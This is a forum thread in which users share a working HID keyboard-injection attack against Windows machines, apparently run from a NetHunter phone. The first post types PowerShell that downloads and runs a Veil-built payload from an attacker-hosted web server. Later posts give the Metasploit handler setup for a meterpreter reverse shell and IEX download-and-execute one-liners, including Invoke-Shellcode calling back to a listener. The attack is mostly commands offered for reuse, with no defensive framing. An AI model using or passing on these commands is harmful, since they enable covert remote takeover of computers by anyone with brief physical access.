Results 1 to 6 of 6

Thread: Hid Keyboard, Payload.

  1. #1

    Hid Keyboard, Payload.

    I recently for one reason or another(probably user error) had trouble getting a windows 7 laptop to accept a payload,
    having tried various ways and coming up empty handed i ended up creating the payload with veil-evasion and hosting it
    in my nexus #/data/local/kali-armhf/var/www folder.

    I then used the windows CMD section of HID Keyboard Attack and entered the following, 192.168.0.2 was the ip of my
    nexus.

    *CD c:/
    Powershell
    $Url='http://192.168.0.2/payload.bat'
    $Path='C:payload.bat'
    $Username=''
    $Password=''

    $WebClient=New-Object System.Net.WebClient
    $WebClient.Credentials=New-Object System.Net.Networkcredential($Username, $Password)
    $WebClient.DownloadFile( $url, $path )

    exit
    payload.bat

    Then i set up the Listener on my kali laptop, to wait for a call. I selected windows 7 ticked Admin, plugged
    in and Pressed Execute. The windows 7 laptop proceeded to download the payload from my nexus and run it.
    Kali then recieved a call back straight away. I'm sure this is by far not the best way to do this and could
    probably be done a lot easier another way, but for me it suited the situation. And just wanted to share.


    Many thanks.

  2. #2
    Would you mind expanding a bit on how to set up the listener?

  3. #3
    Sure, i apologise for my terrible writing, i have no excuse

    Well first i opened a console and did :- service postgresql start
    Followed by :- msfconsole

    Next i used at the msf prompt :- use exploit/multi/handler
    :- set PAYLOAD windows/meterpreter/reverse_http

    Payload i guess really depends on obviously your payload, Any way , just set your LHOST, LPORT and make sure the relevent ports if needed are forwarded in your router.

    Hope this helps, if not give me another shout, again sorry for the terrible writing, its just not my thing.. Cheers

  4. #4
    you should post pictures up for everyone to track

  5. #5
    Join Date
    2015-Oct
    Posts
    2
    Quote Originally Posted by skycrazy View Post
    Sure, i apologise for my terrible writing, i have no excuse

    Well first i opened a console and did :- service postgresql start
    Followed by :- msfconsole

    Next i used at the msf prompt :- use exploit/multi/handler
    :- set PAYLOAD windows/meterpreter/reverse_http

    Payload i guess really depends on obviously your payload, Any way , just set your LHOST, LPORT and make sure the relevent ports if needed are forwarded in your router.

    Hope this helps, if not give me another shout, again sorry for the terrible writing, its just not my thing.. Cheers

    I'm having a lot of troubles trying to get HID Keyboard Attack to work, your information was really help full.

    What i usually do, is send the powershell to download the file from my nethunter device (The usual payload) and the system connect fine using the Windows CMD attack. I can't get it to work from the Powersploit.

    c:\>powershell
    PS c:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload")

    For some reason that i can't understand the payload from nethunter is not downloaded from the /var/www/ directory. I found that this file needs to be in the /usr/share/mana-toolkit/www/portal/ directory. If the file is not there the system won't download the file because it can find it.

    When I'm using this

    PS c:\> IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload")

    some times the meterpreter have problems backgrounding the session, so I end up using


    IEX (New-Object Net.WebClient).DownloadString("http://192.168.5.15/payload"); Invoke-Shellcode –Payload windows/meterpreter/reverse_https –Lhost 192.168.1.105 –Lport 4444 –Force

    By the way i'm suppose to be using the Nethunter 2.0.1 on lollipop, but the Net Hunter Home reports Version 1.0.

    Please excuse my poor English.

  6. #6
    Join Date
    2023-Jan
    Posts
    1
    You used the Veil-Evasion tool to create a payload, hosted it on a Kali Linux machine, and used the HID Keyboard Attack feature in Windows Command Prompt to download the payload onto a Windows 7 laptop. You then set up a listener on your Kali machine, waited for a connection, and were able to remotely execute the payload on the Windows 7 laptop. While this method worked for you, there are likely easier and more efficient ways to achieve the same result, such as using Metasploit or other penetration testing tools.

Similar Threads

  1. Encoded payload
    By theethical in forum General Archive
    Replies: 0
    Last Post: 2019-11-28, 11:22
  2. Raspberry Pi Payload
    By Name Taken in forum ARM Archive
    Replies: 0
    Last Post: 2015-10-30, 13:17
  3. HID Keyboard Payload in /var/www returned error 404 nethunter 2.0
    By Jamborloi in forum NetHunter General Questions
    Replies: 3
    Last Post: 2015-10-29, 00:19

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •